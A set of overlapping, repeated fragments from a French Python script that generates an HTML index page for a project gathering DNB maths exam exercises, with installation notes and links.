"ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\"",
"python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3>",
"* else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################",
"tous les exercices des sujets DNB en partage sur le site de l'APMEP<br>",
"sujets DNB en partage sur le site de l'APMEP<br> Pour le moment le",
"for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([ \"\"\"",
"indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la barre de navigation for elt",
"body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close() if",
"les fichiers HTML import os # On fait les imports nécessaires selon le",
"<a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex dans",
"coding: utf8 -*- # @author : <NAME> \"\"\" Génère une page HTML. \"\"\"",
"lancer Live server et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul>",
"tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme",
"ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\"",
"ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le fichier",
"un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python",
"la barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une",
"en partage sur le site de l'APMEP<br> Pour le moment le test se",
"On fait les imports nécessaires selon le contexte # Pour générer les fichiers",
"fait sur le premier exo du sujet de polynésie 2020<br><br> Pour générer la",
"<a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les",
"</h3> <p>La procédure a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a",
"indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous les exercices des",
"ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer",
"Pour générer les fichiers HTML if __name__ == \"__main__\": from HTML_constantes import *",
"fichier source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) #",
"niveau #os.chdir(\"../\") # On crée le dossier qui va accueillir les fichiers HTML",
"nécessaires selon le contexte # Pour pouvoir créer un répertoire, ici pour y",
"fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui sera appelée pour générer",
"def main(): \"\"\" Fonction principale qui sera appelée pour générer l'ensemble des pages",
": <NAME> \"\"\" Génère une page HTML. \"\"\" pass # On fait les",
"dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la racine du",
"<b>Visual Studio Code</b> lancer Live server et aller dans le dossier <b>PagesWeb</b> et",
"On ouvre en écriture le fichier html qui va recevoir le code indexHTML",
"fichiers HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre",
"docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments",
"Génère une page HTML. \"\"\" pass # On fait les imports nécessaires selon",
"fichiers HTML import os # On fait les imports nécessaires selon le contexte",
"HTML_constantes import * else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier",
"indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet",
"html qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute",
"les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\"",
"in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p>",
"selon le contexte # Pour générer les fichiers HTML if __name__ == \"__main__\":",
"sera appelée pour générer l'ensemble des pages HTML. \"\"\" pass # On remonte",
"ajoute les éléments de la barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt)",
"de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique",
"le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la barre de navigation",
"</p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body",
"sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3>",
"aller dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes </h3>",
"des sujets DNB en partage sur le site de l'APMEP<br> Pour le moment",
"target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a>",
"pouvoir créer un répertoire, ici pour y mettre les fichiers HTML import os",
"On remonte d'un niveau #os.chdir(\"../\") # On crée le dossier qui va accueillir",
"#-*- coding: utf8 -*- # @author : <NAME> \"\"\" Génère une page HTML.",
"les imports nécessaires selon le contexte # Pour générer les fichiers HTML if",
"le fichier html qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") #",
"remonte d'un niveau #os.chdir(\"../\") # On crée le dossier qui va accueillir les",
"navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([",
"imports nécessaires selon le contexte # Pour générer les fichiers HTML if __name__",
"exo du sujet de polynésie 2020<br><br> Pour générer la documentation il faut installer",
"<p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure a été testé sous <b>Linux</b>",
"# On ouvre en écriture le fichier html qui va recevoir le code",
"dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br>",
"source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On",
"</body>\\n </html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close() if __name__ == \"__main__\":",
"<h3> Installation et utilisation </h3> <p>La procédure a été testé sous <b>Linux</b> uniquement.",
"pass # On remonte d'un niveau #os.chdir(\"../\") # On crée le dossier qui",
"générer la documentation il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a>",
"from pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main():",
"############################################################################################################ def main(): \"\"\" Fonction principale qui sera appelée pour générer l'ensemble des",
"fait les imports nécessaires selon le contexte # Pour pouvoir créer un répertoire,",
"testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li>",
"sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer",
"test se fait sur le premier exo du sujet de polynésie 2020<br><br> Pour",
"@author : <NAME> \"\"\" Génère une page HTML. \"\"\" pass # On fait",
"partage sur le site de l'APMEP<br> Pour le moment le test se fait",
"a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li>",
"qui sera appelée pour générer l'ensemble des pages HTML. \"\"\" pass # On",
"et lancer index.html</li> </ul> </p> <h3> Notes </h3> <p> Les fichiers de la",
"dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir",
"os # On fait les imports nécessaires selon le contexte # Pour générer",
"target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source",
"\"\"\" pass # On remonte d'un niveau #os.chdir(\"../\") # On crée le dossier",
"nécessaires selon le contexte # Pour générer les fichiers HTML if __name__ ==",
"fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a>",
"<a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger",
"<p> Le projet consiste à récupérer tous les exercices des sujets DNB en",
"à la racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server et",
"site de l'APMEP<br> Pour le moment le test se fait sur le premier",
"indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et le head for",
"le moment le test se fait sur le premier exo du sujet de",
"<b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\"",
"== \"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes import * ############################################################################################################ #",
"consiste à récupérer tous les exercices des sujets DNB en partage sur le",
"target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a",
"d'un niveau #os.chdir(\"../\") # On crée le dossier qui va accueillir les fichiers",
"On ajoute les éléments de la barre de navigation for elt in barreDeNavigation:",
"<li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format",
"répertoire, ici pour y mettre les fichiers HTML import os # On fait",
"<h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure a été testé sous",
"le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close()",
"target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure a",
"utilisation </h3> <p>La procédure a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette",
"On fait les imports nécessaires selon le contexte # Pour pouvoir créer un",
"# Pour pouvoir créer un répertoire, ici pour y mettre les fichiers HTML",
"été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser",
"</p> <h3> Notes </h3> <p> Les fichiers de la documentations sont générés dans",
"index.html</li> </ul> </p> <h3> Notes </h3> <p> Les fichiers de la documentations sont",
"de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont",
"\"w\") # On ajoute le doctype et le head for elt in docTypeHeadStyle:",
"On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la barre",
"Pour pouvoir créer un répertoire, ici pour y mettre les fichiers HTML import",
"se fait sur le premier exo du sujet de polynésie 2020<br><br> Pour générer",
"<li>Déposer un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script",
"href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n",
"documentation il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3>",
"script python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer",
"fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les",
"</ul> </p> <h3> Notes </h3> <p> Les fichiers de la documentations sont générés",
"os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier html qui va recevoir",
"le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la racine du projet.</li>",
"class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\"",
"faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3>",
"-*- # @author : <NAME> \"\"\" Génère une page HTML. \"\"\" pass #",
"l'ensemble des pages HTML. \"\"\" pass # On remonte d'un niveau #os.chdir(\"../\") #",
"éléments de la barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On",
"une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous",
"* ############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale",
"server et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3>",
"une page HTML. \"\"\" pass # On fait les imports nécessaires selon le",
"<a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler",
"License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body indexHTML.writelines([ \"\"\"",
"# On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste",
"On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à",
"href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure",
"href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png",
"ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On ajoute les éléments de la barre de",
"la documentation il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p>",
"pass # On fait les imports nécessaires selon le contexte # Pour pouvoir",
"pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure a été",
"le doctype et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre",
"le premier exo du sujet de polynésie 2020<br><br> Pour générer la documentation il",
"selon le contexte # Pour pouvoir créer un répertoire, ici pour y mettre",
"format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la",
"HTML import os # On fait les imports nécessaires selon le contexte #",
"</p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La procédure a été testé",
"les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur",
"# On crée le dossier qui va accueillir les fichiers HTML si il",
"pages HTML. \"\"\" pass # On remonte d'un niveau #os.chdir(\"../\") # On crée",
"DNB en partage sur le site de l'APMEP<br> Pour le moment le test",
"le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p> <h3> Notes </h3> <p> Les",
"<a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers",
"HTML. \"\"\" pass # On remonte d'un niveau #os.chdir(\"../\") # On crée le",
"sur le premier exo du sujet de polynésie 2020<br><br> Pour générer la documentation",
"Les fichiers de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers",
"qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le",
"Fonction principale qui sera appelée pour générer l'ensemble des pages HTML. \"\"\" pass",
"fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a>",
"2020<br><br> Pour générer la documentation il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\"",
"indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close() if __name__",
"__name__ == \"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes import * ############################################################################################################",
"la racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server et aller",
"<h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body indexHTML.writelines([",
"\"\"\" <h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous les exercices des sujets",
"<a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et utilisation </h3> <p>La",
"les éléments de la barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) #",
"générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le dossier",
"fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a",
"principale qui sera appelée pour générer l'ensemble des pages HTML. \"\"\" pass #",
"générer l'ensemble des pages HTML. \"\"\" pass # On remonte d'un niveau #os.chdir(\"../\")",
"# Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui sera",
"le script python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual Studio Code</b>",
"# On ajoute les éléments de la barre de navigation for elt in",
"<b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les",
"la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés",
"racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server et aller dans",
"barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n <p> Le",
"fichiers de la documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML",
"le contexte # Pour générer les fichiers HTML if __name__ == \"__main__\": from",
"qui va accueillir les fichiers HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"):",
"elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute une partie spécifique indexHTML.writelines([ \"\"\" <h2>ACCUEIL</h2>\\n",
"href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex dans le",
"sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b>",
"href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier",
"projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server et aller dans le dossier",
"<br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex sur overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\"",
"Installation et utilisation </h3> <p>La procédure a été testé sous <b>Linux</b> uniquement. <ul>",
"HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en",
"les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br>",
"target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un fichier tex",
"le contexte # Pour pouvoir créer un répertoire, ici pour y mettre les",
"dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous",
"# On ajoute le doctype et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt)",
"dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\"",
"y mettre les fichiers HTML import os # On fait les imports nécessaires",
"exercices des sujets DNB en partage sur le site de l'APMEP<br> Pour le",
"pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier html",
"</html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close() if __name__ == \"__main__\": main()",
"contexte # Pour pouvoir créer un répertoire, ici pour y mettre les fichiers",
"ajoute le doctype et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On",
"fichier html qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On",
"*.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la racine",
"os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier html qui va recevoir le",
"for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"]) # On",
"# On remonte d'un niveau #os.chdir(\"../\") # On crée le dossier qui va",
"récupérer tous les exercices des sujets DNB en partage sur le site de",
"import * else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer le fichier pagesWeb/index.HTML",
"de l'APMEP<br> Pour le moment le test se fait sur le premier exo",
"if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture le fichier html qui",
"<li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer",
"le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui sera appelée pour",
"installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation",
"archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet au format *.tex dans le dossier",
"open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et le head for elt in",
"\"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer",
"<h2>ACCUEIL</h2>\\n <p> Le projet consiste à récupérer tous les exercices des sujets DNB",
"documentations sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans",
"= open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et le head for elt",
"pour y mettre les fichiers HTML import os # On fait les imports",
"et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body",
"le test se fait sur le premier exo du sujet de polynésie 2020<br><br>",
"sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a>",
"de la barre de navigation for elt in barreDeNavigation: indexHTML.writelines(elt) # On ajoute",
"</span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le",
"pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui sera appelée pour générer l'ensemble",
"uniquement. <ul> <li>Télécharger cette <a href=\"https://github.com/slozano54/projetDNB/archive/master.zip\"> archive zip</a></li> <li>Décompresser l'archive</li> <li>Déposer un sujet",
"Code</b> lancer Live server et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li>",
"recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et",
"#os.chdir(\"../\") # On crée le dossier qui va accueillir les fichiers HTML si",
"des pages HTML. \"\"\" pass # On remonte d'un niveau #os.chdir(\"../\") # On",
"si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On ouvre en écriture",
"class=\"navButton\" href=\"../exercices_corrections_png/\" target=\"_blank\"><span>voir les fichiers png ajustés</span></a> <br> <a class=\"navButton\" href=\"https://www.overleaf.com/docs?snip_uri=https://mathslozano.fr/mathaleaProjetDNB/tex_a_compiler/dnb_2013_04_pondichery_1.tex&engine=latex_dvipdf\" target=\"_blank\"><span>compiler un",
"fichiers HTML if __name__ == \"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes",
"premier exo du sujet de polynésie 2020<br><br> Pour générer la documentation il faut",
"<li>Lancer le script python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual Studio",
"from HTML_constantes import * else: from pyPack.HTML_constantes import * ############################################################################################################ # Générer le",
"pour générer l'ensemble des pages HTML. \"\"\" pass # On remonte d'un niveau",
"page HTML. \"\"\" pass # On fait les imports nécessaires selon le contexte",
"Studio Code</b> lancer Live server et aller dans le dossier <b>PagesWeb</b> et lancer",
"Notes </h3> <p> Les fichiers de la documentations sont générés dans le dossier",
"lancer index.html</li> </ul> </p> <h3> Notes </h3> <p> Les fichiers de la documentations",
"overleaf</span></a> <a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3> License",
"target=\"_blank\">MIT</a><h3> \"\"\" ]) # On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\"",
"va accueillir les fichiers HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\")",
"les fichiers HTML if __name__ == \"__main__\": from HTML_constantes import * else: from",
"import os # On fait les imports nécessaires selon le contexte # Pour",
"main(): \"\"\" Fonction principale qui sera appelée pour générer l'ensemble des pages HTML.",
"le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) # On ouvre le body indexHTML.writelines([\"<body>\\n\"])",
"############################################################################################################ # Générer le fichier pagesWeb/index.HTML ############################################################################################################ def main(): \"\"\" Fonction principale qui",
"ouvre en écriture le fichier html qui va recevoir le code indexHTML =",
"Pour générer la documentation il faut installer le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\">",
"l'archive</li> <li>Déposer un sujet au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le",
"appelée pour générer l'ensemble des pages HTML. \"\"\" pass # On remonte d'un",
"# On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme",
"\"\"\" pass # On fait les imports nécessaires selon le contexte # Pour",
"fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\" target=\"_blank\"><span>voir les fichiers pdf ajustés</span></a> <a class=\"navButton\" href=\"../exercices_corrections_png/\"",
"<a class=\"navButton\" href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3> License <a",
"# On fait les imports nécessaires selon le contexte # Pour générer les",
